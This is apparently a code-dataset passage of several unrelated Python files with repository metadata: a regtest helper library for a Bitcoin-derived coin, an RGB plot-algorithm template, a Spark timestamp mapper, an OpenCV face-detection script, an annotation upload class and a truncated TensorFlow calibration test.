if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: cephcoind started, waiting for RPC to come up"
wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: RPC succesfully started"
rpcs = []
for i in range(4):
try:
rpcs.append(get_rpc_proxy(rpc_url(i), i))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
enable_mocktime()
block_time = get_mocktime() - (201 * 156)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 156
sync_blocks(rpcs)
stop_nodes(rpcs)
wait_bitcoinds()
disable_mocktime()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i)
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['):
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None):
"""
Start a cephcoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("CEPHD", "cephcoind")
args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ]
if extra_args is not None: args.extend(extra_args)
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: cephcoind started, waiting for RPC to come up"
url = rpc_url(i, rpchost)
wait_for_bitcoind_start(bitcoind_processes[i], url, i)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: RPC succesfully started"
proxy = get_rpc_proxy(url, i, timeout=timewait)
if COVERAGE_DIR:
coverage.write_all_rpc_commands(COVERAGE_DIR, proxy)
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple cephcoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
rpcs = []
try:
for i in range(num_nodes):
rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]))
except:
stop_nodes(rpcs)
raise
return rpcs
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
change_address = from_node.getnewaddress()
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, basestring):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find == True:
assert_equal(expected, { })
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find == True:
num_matched = num_matched+1
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects were found %s"%(str(to_match)))
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
node.generate(int(0.5*count)+101)
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in xrange(iterations):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value/2)
outputs[addr2] = satoshi_round(send_value/2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
txid = node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
script_pubkey = "6a4d0200"
for i in xrange (512):
script_pubkey = script_pubkey + "01"
txouts = "81"
for k in xrange(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
def create_tx(node, coinbase, to_address, amount):
inputs = [{ "txid" : coinbase, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, fee):
addr = node.getnewaddress()
txids = []
for i in xrange(len(utxos)):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr] = satoshi_round(send_value)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def get_bip9_status(node, key):
info = node.getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
raise IndexError ('key:"%s" not found' % key)
| false
| true
|
790b13e0719e348fcf4df241d8465987b32600d0
| 2,400
|
py
|
Python
|
algorithm_rgb.py
|
jvanderleeuw/template-rgb-plot-test
|
88d88eccfd182f293d217a04b7ecd40f7b03b9f0
|
[
"BSD-3-Clause"
] | 2
|
2020-02-07T16:08:39.000Z
|
2020-02-17T15:08:38.000Z
|
algorithm_rgb.py
|
jvanderleeuw/template-rgb-plot-test
|
88d88eccfd182f293d217a04b7ecd40f7b03b9f0
|
[
"BSD-3-Clause"
] | 5
|
2020-07-23T23:45:47.000Z
|
2021-09-13T20:11:54.000Z
|
.github/workflows/algorithm_rgb.py
|
AgPipeline/plot-base-rgb
|
012cf97e45a0f281d21b94e02ff05fd34b459805
|
[
"BSD-3-Clause"
] | 3
|
2019-11-22T20:12:57.000Z
|
2021-05-07T13:52:12.000Z
|
"""My nifty plot-level RGB algorithm
"""
# Importing modules. Please add any additional import statements below
import numpy as np
# Definitions
# Please replace these definitions' values with the correct ones
VERSION = '1.0'
# Information on the creator of this algorithm
ALGORITHM_AUTHOR = 'Unknown'
ALGORITHM_AUTHOR_EMAIL = ''
ALGORITHM_CONTRIBUTORS = [""]
ALGORITHM_NAME = 'my nifty one'
ALGORITHM_DESCRIPTION = 'This algorithm calculates the niftyness of RGB plot-level images'
# Citation information for publication (more information in HOW_TO.md)
CITATION_AUTHOR = 'unknown'
CITATION_TITLE = ''
CITATION_YEAR = ''
# The name of one or more variables returned by the algorithm, separated by commas (more information in HOW_TO.md)
# If only one name is specified, no comma's are used.
# Note that variable names cannot have comma's in them: use a different separator instead. Also,
# all white space is kept intact; don't add any extra whitespace since it may cause name comparisons
# to fail.
# !! Replace the content of this string with your variable names
VARIABLE_NAMES = 'size of image channels'
# Variable units matching the order of VARIABLE_NAMES, also comma-separated.
# For each variable name in VARIABLE_NAMES add the unit of measurement the value represents.
# !! Replace the content of this string with your variables' unit
VARIABLE_UNITS = 'pixels'
# Variable labels matching the order of VARIABLE_NAMES, also comma-separated.
# This is an optional definition and can be left empty.
VARIABLE_LABELS = ''
# Optional override for the generation of a BETYdb compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_BETYDB_CSV = True
# Optional override for the generation of a TERRA REF Geostreams compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_GEOSTREAMS_CSV = True
# Entry point for plot-level RBG algorithm
def calculate(pxarray: np.ndarray):
"""Calculates one or more values from plot-level RGB data
Arguments:
pxarray: Array of RGB data for a single plot
Return:
Returns one or more calculated values
"""
# ALGORITHM: replace the following lines with your algorithm
channel_size = pxarray[:, :, 1].size
# RETURN: replace the following return with your calculated values. Be sure to order them as defined in VARIABLE_NAMES above
return channel_size
| 38.095238
| 128
| 0.768333
|
import numpy as np
VERSION = '1.0'
# Information on the creator of this algorithm
ALGORITHM_AUTHOR = 'Unknown'
ALGORITHM_AUTHOR_EMAIL = ''
ALGORITHM_CONTRIBUTORS = [""]
ALGORITHM_NAME = 'my nifty one'
ALGORITHM_DESCRIPTION = 'This algorithm calculates the niftyness of RGB plot-level images'
# Citation information for publication (more information in HOW_TO.md)
CITATION_AUTHOR = 'unknown'
CITATION_TITLE = ''
CITATION_YEAR = ''
# The name of one or more variables returned by the algorithm, separated by commas (more information in HOW_TO.md)
# If only one name is specified, no comma's are used.
# all white space is kept intact; don't add any extra whitespace since it may cause name comparisons
VARIABLE_NAMES = 'size of image channels'
VARIABLE_UNITS = 'pixels'
# Variable labels matching the order of VARIABLE_NAMES, also comma-separated.
# This is an optional definition and can be left empty.
VARIABLE_LABELS = ''
# Optional override for the generation of a BETYdb compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_BETYDB_CSV = True
# Optional override for the generation of a TERRA REF Geostreams compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_GEOSTREAMS_CSV = True
# Entry point for plot-level RBG algorithm
def calculate(pxarray: np.ndarray):
# ALGORITHM: replace the following lines with your algorithm
channel_size = pxarray[:, :, 1].size
# RETURN: replace the following return with your calculated values. Be sure to order them as defined in VARIABLE_NAMES above
return channel_size
| true
| true
|
790b14439046bd301a529a673057b56fe6681eb9
| 315
|
py
|
Python
|
sprint/core/parser/args.py
|
ii-Python/Sprint-v2
|
2579b7f9a36ac5c5ec541ca3dce6cf61357db948
|
[
"MIT"
] | null | null | null |
sprint/core/parser/args.py
|
ii-Python/Sprint-v2
|
2579b7f9a36ac5c5ec541ca3dce6cf61357db948
|
[
"MIT"
] | null | null | null |
sprint/core/parser/args.py
|
ii-Python/Sprint-v2
|
2579b7f9a36ac5c5ec541ca3dce6cf61357db948
|
[
"MIT"
] | null | null | null |
class Argument(object):
def __init__(self, argument = None, base: bool = False):
self.arg = argument
self.is_base = base
def __repr__(self):
return self.arg
def __str__(self):
return self.arg
def is_pipe(self):
return self.arg == ">>" or self.arg == "<<"
| 21
| 60
| 0.571429
|
class Argument(object):
def __init__(self, argument = None, base: bool = False):
self.arg = argument
self.is_base = base
def __repr__(self):
return self.arg
def __str__(self):
return self.arg
def is_pipe(self):
return self.arg == ">>" or self.arg == "<<"
| true
| true
|
790b153c215eea49b75468a9c1aed9959780cb22
| 1,662
|
py
|
Python
|
spark_auto_mapper/data_types/unix_timestamp.py
|
icanbwell/SparkAutoMapper
|
bfd5da72f3b55ec48860935228c1ecf6d7c1a2e4
|
[
"Apache-2.0"
] | 2
|
2021-12-27T10:41:59.000Z
|
2022-02-24T00:19:40.000Z
|
spark_auto_mapper/data_types/unix_timestamp.py
|
icanbwell/SparkAutoMapper
|
bfd5da72f3b55ec48860935228c1ecf6d7c1a2e4
|
[
"Apache-2.0"
] | 5
|
2020-10-22T01:19:11.000Z
|
2021-03-18T16:04:23.000Z
|
spark_auto_mapper/data_types/unix_timestamp.py
|
icanbwell/SparkAutoMapper
|
bfd5da72f3b55ec48860935228c1ecf6d7c1a2e4
|
[
"Apache-2.0"
] | 3
|
2020-12-17T21:23:46.000Z
|
2021-07-29T18:08:31.000Z
|
from typing import Optional
from pyspark.sql import Column, DataFrame
from pyspark.sql.functions import from_unixtime, to_timestamp
from spark_auto_mapper.data_types.data_type_base import AutoMapperDataTypeBase
from spark_auto_mapper.helpers.value_parser import AutoMapperValueParser
from spark_auto_mapper.type_definitions.defined_types import AutoMapperNumberInputType
class AutoMapperUnixTimestampType(AutoMapperDataTypeBase):
def __init__(self, value: AutoMapperNumberInputType) -> None:
"""
Converts the value to a timestamp type in Spark
:param value: value
:param formats: (Optional) formats to use for trying to parse the value otherwise uses Spark defaults
"""
super().__init__()
self.value: AutoMapperDataTypeBase = (
value
if isinstance(value, AutoMapperDataTypeBase)
else AutoMapperValueParser.parse_value(value)
)
def get_column_spec(
self, source_df: Optional[DataFrame], current_column: Optional[Column]
) -> Column:
# Convert from unix timestamp
column_spec: Column = to_timestamp(
from_unixtime(
self.value.get_column_spec(
source_df=source_df, current_column=current_column
),
format="yyyy-MM-dd HH:mm:ss",
),
format="yyyy-MM-dd HH:mm:ss",
)
if source_df is not None:
return column_spec
else:
column_spec = self.value.get_column_spec(
source_df=source_df, current_column=current_column
)
return column_spec
| 33.918367
| 109
| 0.661252
|
from typing import Optional
from pyspark.sql import Column, DataFrame
from pyspark.sql.functions import from_unixtime, to_timestamp
from spark_auto_mapper.data_types.data_type_base import AutoMapperDataTypeBase
from spark_auto_mapper.helpers.value_parser import AutoMapperValueParser
from spark_auto_mapper.type_definitions.defined_types import AutoMapperNumberInputType
class AutoMapperUnixTimestampType(AutoMapperDataTypeBase):
def __init__(self, value: AutoMapperNumberInputType) -> None:
super().__init__()
self.value: AutoMapperDataTypeBase = (
value
if isinstance(value, AutoMapperDataTypeBase)
else AutoMapperValueParser.parse_value(value)
)
def get_column_spec(
self, source_df: Optional[DataFrame], current_column: Optional[Column]
) -> Column:
column_spec: Column = to_timestamp(
from_unixtime(
self.value.get_column_spec(
source_df=source_df, current_column=current_column
),
format="yyyy-MM-dd HH:mm:ss",
),
format="yyyy-MM-dd HH:mm:ss",
)
if source_df is not None:
return column_spec
else:
column_spec = self.value.get_column_spec(
source_df=source_df, current_column=current_column
)
return column_spec
| true
| true
|
790b1607e2dbab856491d37aa237082f14588b83
| 2,040
|
py
|
Python
|
face_detection_cv2.py
|
HDWilliams/User_Verification_HPE
|
753cd5b3a757e228baba56a48fd50a56aea0b485
|
[
"MIT"
] | null | null | null |
face_detection_cv2.py
|
HDWilliams/User_Verification_HPE
|
753cd5b3a757e228baba56a48fd50a56aea0b485
|
[
"MIT"
] | null | null | null |
face_detection_cv2.py
|
HDWilliams/User_Verification_HPE
|
753cd5b3a757e228baba56a48fd50a56aea0b485
|
[
"MIT"
] | null | null | null |
import cv2
import pose_detection as pose_d
pose_model = pose_d.load_pose_model('pre_trained\AFLW2000.pkl')
def detect_face(img_PATH, model_PATH):
# Load the cascade
face_cascade = cv2.CascadeClassifier(model_PATH)
# Read the input image
img = cv2.imread(img_PATH)
# Convert into grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect faces
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
if len(faces) > 1:
print('Multiple faces detected')
return False
elif len(faces) < 1:
print('No faces detected')
return False
# Draw rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
# Display the output
#cv2_imshow(img)
cv2.waitKey()
return True # TO DO may want to return face at some point as well
def detect_face_video(pose_model):
# Load the cascade
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
# To capture video from webcam.
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
# To use a video file as input
# cap = cv2.VideoCapture('filename.mp4')
while True:
# Read the frame
_, img = cap.read()
# Convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect the faces
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
# Get pose estimate
yaw, pitch, roll = pose_d.run_pose_detection(pose_model, pose_d.load_img(img))
# Draw the rectangle around each face
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
#draw pose label
img = pose_d.draw_labels(yaw, pitch, roll, img)
# Display
cv2.imshow('img', img)
# Stop if escape key is pressed
k = cv2.waitKey(30) & 0xff
if k==27:
break
# Release the VideoCapture object
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
detect_face_video(pose_model)
| 31.875
| 103
| 0.645588
|
import cv2
import pose_detection as pose_d
pose_model = pose_d.load_pose_model('pre_trained\AFLW2000.pkl')
def detect_face(img_PATH, model_PATH):
face_cascade = cv2.CascadeClassifier(model_PATH)
img = cv2.imread(img_PATH)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
if len(faces) > 1:
print('Multiple faces detected')
return False
elif len(faces) < 1:
print('No faces detected')
return False
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
cv2.waitKey()
return True
def detect_face_video(pose_model):
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
while True:
_, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
yaw, pitch, roll = pose_d.run_pose_detection(pose_model, pose_d.load_img(img))
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
img = pose_d.draw_labels(yaw, pitch, roll, img)
cv2.imshow('img', img)
k = cv2.waitKey(30) & 0xff
if k==27:
break
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
detect_face_video(pose_model)
| true
| true
|
790b1681efe2d5bb5b44069894dfe0b461c9f34f
| 753
|
py
|
Python
|
database/task_class/annotation.py
|
cozy9/Metascape
|
261901657bef5e1060f1ae86a2a3913d1e4c87c4
|
[
"Apache-2.0"
] | 2
|
2021-08-01T19:33:44.000Z
|
2022-02-14T16:37:34.000Z
|
database/task_class/annotation.py
|
data2code/Metascape
|
261901657bef5e1060f1ae86a2a3913d1e4c87c4
|
[
"Apache-2.0"
] | null | null | null |
database/task_class/annotation.py
|
data2code/Metascape
|
261901657bef5e1060f1ae86a2a3913d1e4c87c4
|
[
"Apache-2.0"
] | 1
|
2019-05-22T12:44:34.000Z
|
2019-05-22T12:44:34.000Z
|
#!/usr/bin/env python
#from .core import *
import numpy as np
import pandas as pd
import shutil
import urllib
import urlparse
from os.path import splitext, basename
import os
from os import sys, path
from pprint import pprint
import StringIO
import db
from gp import *
from core import *
from IPython.core.debugger import Tracer
class Annotation(UploadCsvConvert):
def __init__(self, xe):
xe.attrib['newCols'] = 'gid,annotation_type_id,content,annotation_field1,ds,tax_id'
UploadCsvConvert.__init__(self,xe=xe,dest='annotation')
self.type_col = 'annotation_type_id'
def get_type_col_value_sql(self):
return 'SELECT annotation_type_id FROM %s.annotation_type WHERE annotation_type_name = ?' % SyncDB.DATABASE
| 25.965517
| 115
| 0.759628
|
import numpy as np
import pandas as pd
import shutil
import urllib
import urlparse
from os.path import splitext, basename
import os
from os import sys, path
from pprint import pprint
import StringIO
import db
from gp import *
from core import *
from IPython.core.debugger import Tracer
class Annotation(UploadCsvConvert):
def __init__(self, xe):
xe.attrib['newCols'] = 'gid,annotation_type_id,content,annotation_field1,ds,tax_id'
UploadCsvConvert.__init__(self,xe=xe,dest='annotation')
self.type_col = 'annotation_type_id'
def get_type_col_value_sql(self):
return 'SELECT annotation_type_id FROM %s.annotation_type WHERE annotation_type_name = ?' % SyncDB.DATABASE
| true
| true
|
790b171ce026ef2d18e83d1683d9e31e7e375328
| 10,338
|
py
|
Python
|
research/object_detection/builders/calibration_builder_test.py
|
zhaowt96/models
|
03182253673b0e2666ad9a33839759834c0acebd
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/builders/calibration_builder_test.py
|
zhaowt96/models
|
03182253673b0e2666ad9a33839759834c0acebd
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/builders/calibration_builder_test.py
|
zhaowt96/models
|
03182253673b0e2666ad9a33839759834c0acebd
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for calibration_builder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import interpolate
from six.moves import zip
import tensorflow as tf
from object_detection.builders import calibration_builder
from object_detection.protos import calibration_pb2
from object_detection.utils import test_case
class CalibrationBuilderTest(test_case.TestCase):
def test_tf_linear_interp1d_map(self):
"""Tests TF linear interpolation mapping to a single number."""
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.5, 0.5, 0.5])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_map_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_map_outputs
tf_map_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_map_outputs_np, [0.5, 0.5, 0.5, 0.5, 0.5])
def test_tf_linear_interp1d_interpolate(self):
"""Tests TF 1d linear interpolation not mapping to a single number."""
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.6, 0.7, 1.0])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_interpolate_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_interpolate_outputs
tf_interpolate_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_interpolate_outputs_np, [0.6, 0.65, 0.7, 0.85, 1.])
@staticmethod
def _get_scipy_interp1d(new_x, x, y):
"""Helper performing 1d linear interpolation using SciPy."""
interpolation1d_fn = interpolate.interp1d(x, y)
return interpolation1d_fn(new_x)
def _get_tf_interp1d(self, new_x, x, y):
"""Helper performing 1d linear interpolation using Tensorflow."""
def graph_fn():
tf_interp_outputs = calibration_builder._tf_linear_interp1d(
tf.convert_to_tensor(new_x, dtype=tf.float32),
tf.convert_to_tensor(x, dtype=tf.float32),
tf.convert_to_tensor(y, dtype=tf.float32))
return tf_interp_outputs
np_tf_interp_outputs = self.execute(graph_fn, [])
return np_tf_interp_outputs
def test_tf_linear_interp1d_against_scipy_map(self):
"""Tests parity of TF linear interpolation with SciPy for simple mapping."""
length = 10
np_x = np.linspace(0, 1, length)
# Mapping all numbers to 0.5
np_y_map = np.repeat(0.5, length)
# Scipy and TF interpolations
test_data_np = np.linspace(0, 1, length * 10)
scipy_map_outputs = self._get_scipy_interp1d(test_data_np, np_x, np_y_map)
np_tf_map_outputs = self._get_tf_interp1d(test_data_np, np_x, np_y_map)
self.assertAllClose(scipy_map_outputs, np_tf_map_outputs)
def test_tf_linear_interp1d_against_scipy_interpolate(self):
"""Tests parity of TF linear interpolation with SciPy."""
length = 10
np_x = np.linspace(0, 1, length)
# Requires interpolation over 0.5 to 1 domain
np_y_interp = np.linspace(0.5, 1, length)
# Scipy interpolation for comparison
test_data_np = np.linspace(0, 1, length * 10)
scipy_interp_outputs = self._get_scipy_interp1d(test_data_np, np_x,
np_y_interp)
np_tf_interp_outputs = self._get_tf_interp1d(test_data_np, np_x,
np_y_interp)
self.assertAllClose(scipy_interp_outputs, np_tf_interp_outputs)
@staticmethod
def _add_function_approximation_to_calibration_proto(calibration_proto,
x_array, y_array,
class_id):
"""Adds a function approximation to calibration proto for a class id."""
# Per-class calibration.
if class_id is not None:
function_approximation = (
calibration_proto.class_id_function_approximations
.class_id_xy_pairs_map[class_id])
# Class-agnostic calibration.
else:
function_approximation = (
calibration_proto.function_approximation.x_y_pairs)
for x, y in zip(x_array, y_array):
x_y_pair_message = function_approximation.x_y_pair.add()
x_y_pair_message.x = x
x_y_pair_message.y = y
def test_class_agnostic_function_approximation(self):
"""Tests that calibration produces correct class-agnostic values."""
# Generate fake calibration proto. For this interpolation, any input on
# [0.0, 0.5] should be divided by 2 and any input on (0.5, 1.0] should have
# 0.25 subtracted from it.
class_agnostic_x = np.asarray([0.0, 0.5, 1.0])
class_agnostic_y = np.asarray([0.0, 0.25, 0.75])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_agnostic_x, class_agnostic_y, class_id=None)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
